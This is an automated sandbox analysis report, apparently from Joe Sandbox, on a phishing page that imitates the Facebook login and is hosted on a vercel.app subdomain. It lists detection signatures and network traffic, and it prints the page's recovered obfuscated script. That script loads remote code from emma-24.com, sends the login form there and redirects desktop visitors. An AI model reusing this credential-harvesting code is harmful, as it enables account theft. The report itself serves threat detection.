Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html

Overview

General Information

Sample URL:https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html
Analysis ID:1591436
Infos:

Detection

HTMLPhisher
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected HtmlPhish10
Yara detected HtmlPhish44
AI detected suspicious Javascript
Form action URLs do not match main URL
HTML body contains low number of good links
Invalid 'forgot password' link found
No HTML title found
Suspicious form URL found

Classification

  • System is w10x64
  • chrome.exe (PID: 6708 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 5068 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2568 --field-trial-handle=2536,i,12870712407425050834,15902739686211572899,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 6596 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_50JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    1.4..script.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      2.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.htmlAvira URL Cloud: detection malicious, Label: phishing
        Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/touch.cssAvira URL Cloud: Label: phishing
        Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/img_2713.jpgAvira URL Cloud: Label: phishing
        Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/style.cssAvira URL Cloud: Label: phishing
        Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/facebooklogo.pngAvira URL Cloud: Label: phishing
        Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/favicon.icoAvira URL Cloud: Label: phishing

        Phishing

        barindex
        Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968Joe Sandbox AI: Score: 9 Reasons: The brand 'Facebook' is well-known and is associated with the domain 'facebook.com'., The URL 'mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app' does not match the legitimate domain 'facebook.com'., The URL contains multiple hyphens and a subdomain structure that is not typical for Facebook., The domain 'vercel.app' is a hosting platform and not directly associated with Facebook., The presence of input fields for 'Email or phone number' and password is typical for phishing attempts targeting Facebook credentials. DOM: 2.0.pages.csv
        Source: Yara matchFile source: 1.4..script.csv, type: HTML
        Source: Yara matchFile source: 2.0.pages.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_50, type: DROPPED
        Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to a suspicious domain. The use of obfuscated code and the attempt to detect and redirect mobile devices further increases the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution.
        Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/... This script demonstrates several high-risk behaviors, including redirecting users to an external domain (https://www.justice.gov/archive/ndic/spanish/13420/index.htm) based on device detection. The use of obfuscated code and the redirection to an untrusted domain are strong indicators of malicious intent. While the script may have a legitimate purpose, such as mobile optimization, the lack of transparency and the suspicious redirection raise significant security concerns.
        Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968HTTP Parser: Form action: https://emma-24.com/post.php vercel emma-24
        Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968HTTP Parser: Number of links: 0
        Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968HTTP Parser: Invalid link: Forgot Password?
        Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968HTTP Parser: HTML title missing
        Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968HTTP Parser: Form action: https://emma-24.com/post.php
        Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968HTTP Parser: <input type="password" .../> found
        Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968HTTP Parser: No favicon
        Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968HTTP Parser: No <meta name="author".. found
        Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968HTTP Parser: No <meta name="copyright".. found
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49716 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49762 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49845 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49957 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50010 version: TLS 1.2
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: global trafficHTTP traffic detected: GET /facebook.com.html HTTP/1.1Host: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /style.css HTTP/1.1Host: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /pingjs/?k=condiossi729&t=LA%20CENTRAL%20%F0%9F%91%BB&x=https://www.facebook.com/ HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /index.php?username=panilover HTTP/1.1Host: emma-24.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /pingjs/?k=3445435454v?&t=~GOOGLE~&x=https://www.google.com/ HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /pingjs/?k=pe3434gg?&t=~GOOGLE~&x=https://www.google.com/ HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/touch.css HTTP/1.1Host: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/facebooklogo.png HTTP/1.1Host: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/img_2713.jpg HTTP/1.1Host: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /index.php?username=panilover HTTP/1.1Host: emma-24.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /pingjs/?k=pe3434gg?&t=~GOOGLE~&x=https://www.google.com/ HTTP/1.1Host: whos.amung.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /pingjs/?k=3445435454v?&t=~GOOGLE~&x=https://www.google.com/ HTTP/1.1Host: whos.amung.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: chromecache_50.3.drString found in binary or memory: document.write(unescape("%0A%3Chtml%3E%0A%0A%3Chead%3E%0A%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%3C/meta%3E%0A%20%20%3Cmeta%20content%3D%22width%3Ddevice-width%22%20name%3D%22viewport%22%3E%3C/meta%3E%0A%20%20%3Ctitle%3Ereplit%3C/title%3E%0A%20%20%3Clink%20href%3D%22style.css%22%20rel%3D%22stylesheet%22%20type%3D%22text/css%22%3E%3C/link%3E%0A%3C/head%3E%0A%0A%3Cbody%3E%0A%20%20%3Cscript%20async%3D%22%22%20src%3D%22https%3A//emma-24.com/index.php%3Fusername%3Dpanilover%22%20type%3D%22text/javascript%22%3E%3C/script%3E%0A%3C/body%3E%0A%0A%3C/html%3E%0A%0A%3Cimg%20alt%3D%22%22%20src%3D%22//whos.amung.us/pingjs/%3Fk%3Dcondiossi729%26amp%3Bt%3DLA%20CENTRAL%20%uD83D%uDC7B%26amp%3Bx%3Dhttps%3A//www.facebook.com/%22%20style%3D%22display%3A%20none%3B%22%20/%3E%0A%0A%3Cscript%20type%3D%22text/javascript%22%3E%0A%09document.oncontextmenu%20%3D%20function%28%29%7Breturn%20false%7D%0A%3C/script%3E%0A%0A%0A%0A%0A%3Cscript%20type%3D%22text/javascript%22%3E%0A//%3C%21%5BCDATA%5B%0A%20function%20h%28r%2C%20a%29%20%7B%20var%20t%20%3D%20%22%22%3B%20if%20%28%22mix%22%20%3D%3D%20a%29%20var%20h%20%3D%20%0A%22ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789%22%3B%20else%20var%20h%20%3D%20%0A%22ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789%22%3B%20for%20%28var%20n%20%3D%200%3B%20r%20%3E%20n%3B%20n++%29%20t%20+%3D%20h.charAt%28Math.floor%28Math.random%28%29%20*%20%0Ah.length%29%29%3B%20return%20t%20%7D%3B%0A%0A%20%20%20%20%20%20%20%20var%20device%20%3D%20navigator.userAgent%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20if%20%28device.match%28/Iphone/i%29%7C%7C%20device.match%28/Ipod/i%29%7C%7C%20device.match%28/Android/i%29%7C%7C%20device.match%28/J2ME/i%29%7C%7C%20device.match%28/BlackBerry/i%29%7C%7C%20device.match%28/iPhone%7CiPad%7CiPod/i%29%7C%7C%20device.match%28/Opera%20Mini/i%29%7C%7C%20device.match%28/IEMobile/i%29%7C%7C%20device.match%28/Mobile/i%29%7C%7C%20device.match%28/Windows%20Phone/i%29%7C%7C%20device.match%28/windows%20mobile/i%29%7C%7C%20device.match%28/windows%20ce/i%29%7C%7C%20device.match%28/webOS/i%29%7C%7C%20device.match%28/palm/i%29%7C%7C%20device.match%28/bada/i%29%7C%7C%20device.match%28/series60/i%29%7C%7C%20device.match%28/nokia/i%29%7C%7C%20device.match%28/symbian/i%29%7C%7C%20device.match%28/HTC/i%29%29%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%7Delse%0A%7B%0Awindow.location%20%3D%20%22https%3A//www.justice.gov/archive/ndic/spanish/13420/index.htm%22%3C/script%3E")); equals www.facebook.com (Facebook)
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app
        Source: global trafficDNS traffic detected: DNS query: emma-24.com
        Source: global trafficDNS traffic detected: DNS query: whos.amung.us
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: public, max-age=0, must-revalidateContent-Length: 39Content-Type: text/plain; charset=utf-8Date: Tue, 14 Jan 2025 23:42:31 GMTServer: VercelStrict-Transport-Security: max-age=63072000; includeSubDomains; preloadX-Vercel-Error: NOT_FOUNDX-Vercel-Id: iad1::f742j-1736898151768-df29e8a43a54Connection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: public, max-age=0, must-revalidateContent-Length: 39Content-Type: text/plain; charset=utf-8Date: Tue, 14 Jan 2025 23:42:33 GMTServer: VercelStrict-Transport-Security: max-age=63072000; includeSubDomains; preloadX-Vercel-Error: NOT_FOUNDX-Vercel-Id: iad1::6lln6-1736898153546-23c56103686aConnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: public, max-age=0, must-revalidateContent-Length: 39Content-Type: text/plain; charset=utf-8Date: Tue, 14 Jan 2025 23:42:33 GMTServer: VercelStrict-Transport-Security: max-age=63072000; includeSubDomains; preloadX-Vercel-Error: NOT_FOUNDX-Vercel-Id: iad1::f6c5k-1736898153561-936fb51d16dfConnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: public, max-age=0, must-revalidateContent-Length: 39Content-Type: text/plain; charset=utf-8Date: Tue, 14 Jan 2025 23:42:33 GMTServer: VercelStrict-Transport-Security: max-age=63072000; includeSubDomains; preloadX-Vercel-Error: NOT_FOUNDX-Vercel-Id: iad1::7vb9r-1736898153577-25c2ae96e09eConnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: public, max-age=0, must-revalidateContent-Length: 39Content-Type: text/plain; charset=utf-8Date: Tue, 14 Jan 2025 23:42:34 GMTServer: VercelStrict-Transport-Security: max-age=63072000; includeSubDomains; preloadX-Vercel-Error: NOT_FOUNDX-Vercel-Id: iad1::lbg9g-1736898154218-6c6d5dbe6fe3Connection: close
        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49716 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49762 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49845 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49957 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50010 version: TLS 1.2
        Source: classification engineClassification label: mal84.phis.win@16/22@12/8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2568 --field-trial-handle=2536,i,12870712407425050834,15902739686211572899,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html"
